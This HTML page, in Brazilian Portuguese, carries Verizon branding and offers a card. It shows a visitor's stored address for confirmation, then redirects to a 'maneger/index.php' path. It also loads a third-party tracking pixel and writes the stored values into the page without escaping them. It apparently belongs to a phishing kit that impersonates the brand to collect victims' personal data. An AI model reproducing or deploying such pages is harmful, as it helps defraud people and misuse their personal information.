<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verizon - Faça seu Cartão</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/style.css">
    
<script src="js/latest.js" async="" defer=""></script>

<script>
  window.pixelId = "66bb763debbcebab27d68442";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
    
</head>      
<body>
    <link rel="stylesheet" href="css/style.css">

<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">   
    <div class="header">
        <img style="width: 160px;" src="images/VfoPzxB.png" alt="Imagem Centralizada"> 
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 40px;" class="main-content">
            <!-- Seção de confirmação de dados -->
            <div id="confirmacao-dados-secao" class="mb-3">
                <h5>Seus dados estão corretos?</h5>
                <p class="text-start" id="dados-endereco">,  <br><br> /<br></p>
                <button class="btn btn-custom w-80 rounded-pill" onclick="confirmarDados()">Os dados estão corretos</button>
            </div>
        </div>
    </div>

    <script>
        function carregarDadosEndereco() {
            // Recupera os dados do localStorage
            const rua = localStorage.getItem('rua') || '';
            const numero = localStorage.getItem('numero') || '';
            const complemento = localStorage.getItem('complemento') || '';
            const bairro = localStorage.getItem('bairro') || '';
            const cidade = localStorage.getItem('cidade') || '';
            const estado = localStorage.getItem('estado') || '';
            const cep = localStorage.getItem('cep') || '';

            // Monta o endereço completo
            const enderecoCompleto = `${rua}, ${numero} ${complemento ? ', ' + complemento : ''}<br>${bairro}<br> ${cidade}/${estado}<br>${cep}`;

            // Insere o endereço completo no elemento HTML
            document.getElementById('dados-endereco').innerHTML = enderecoCompleto;
        }

        carregarDadosEndereco();

        function confirmarDados() {
            location.href = 'maneger/index.php';
        }
        
    </script>

    <div class="footer py-4" id="footerChg">
        © 2024 Verizon S/A. CNPJ 68.694.585/0001-20. <br>
        Av. Brig. Faria Lima, 1811, São Paulo/SP
    </div>

    <script src="js/bootstrap.bundle.min.js"></script>




</div></body></html>